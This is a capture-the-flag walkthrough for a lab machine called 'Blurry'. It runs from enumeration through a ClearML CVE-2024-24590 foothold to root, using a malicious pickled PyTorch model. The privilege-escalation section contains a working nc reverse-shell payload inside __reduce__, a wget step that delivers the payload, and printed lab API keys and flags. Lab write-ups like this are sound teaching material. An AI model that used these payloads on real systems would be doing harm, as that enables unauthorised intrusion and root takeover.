Blurry - Walkthrough

Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities CVE-2024-24590 - CVE-2024-24595 that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with sudo is discovered. The program loads arbitrary PyTorch models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, fickling is used to scan the dataset for insecure pickle files , prior to loading the model. Malicious code can be injected into a model, using runpy to bypass the fickling checks.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.19 -oG allPorts

The scan reveals:

PORT	STATE	SERVICE
22/tcp	open	ssh
80/tcp	open	http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.19 -oN targeted

SSH → OpenSSH 8.4p1 Debian 5+deb11u3
HTTP → nginx 1.18.0, redirecting to app.blurry.htb

We add the hostname to /etc/hosts:

sudo sh -c 'echo "10.10.11.19 blurry.htb app.blurry.htb" >> /etc/hosts'

We perform subdomain fuzzing:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://blurry.htb -H "Host: FUZZ.blurry.htb" -fs 169

Discovered subdomains: files, app, chat

app.blurry.htb/dashboard

chat.blurry.htb

The chat subdomain reveals a username: jippity

Foothold

The application runs ClearML, an ML experiment tracking platform. We set up the ClearML client:

sudo apt install python3.11-venv
python3 -m venv .env
source .env/bin/activate
pip install clearml
clearml-init

This reveals API credentials:

api {
  web_server: http://app.blurry.htb
  api_server: http://api.blurry.htb
  files_server: http://files.blurry.htb
  credentials {
    "access_key" = "B0KCP3QYFV1IZFS9SRY2"
    "secret_key" = "I6iImsuAGcxECntt3HZSYwkoMtmoZJ9NYyy0eNGQBQ0Ol3VhMH"
  }
}

ClearML is vulnerable to CVE-2024-24590 (Pre-Auth RCE). We exploit it to gain a shell as jippity:

git clone https://github.com/DemonPandaz2763/CVE-2024-24590.git
python3 exploit.py

User flag captured:

cat user.txt

User flag: 85fdd3c30f09caeb0fd4fa4dbec25fb1

Privilege Escalation

We check sudo privileges:

sudo -l

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

The /models directory is writable. The script loads and evaluates PyTorch models, which are serialized using pickle. We create a malicious model:

import torch
import torch.nn as nn
import os
 
class Exploit(nn.Module):
    def __init__(self):
        super(Exploit, self).__init__()
        self.dense = nn.Linear(10, 1)
 
    def forward(self, x):
        return self.dense(x)
 
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 4000 >/tmp/f"
        return os.system, (cmd,)
 
model = Exploit()
torch.save(model, 'exploit.pth')

We host and download the payload:

python3 -m http.server 80
wget http://10.10.14.36/exploit.pth -O /models/exploit.pth

We execute the model evaluator:

sudo /usr/bin/evaluate_model /models/exploit.pth

[+] Model /models/exploit.pth is considered safe. Processing...

Root shell received on our listener:

nc -lvnp 4000

Root flag obtained:

cat /root/root.txt

Root flag: 5175188a6a603edf71faf262642027ca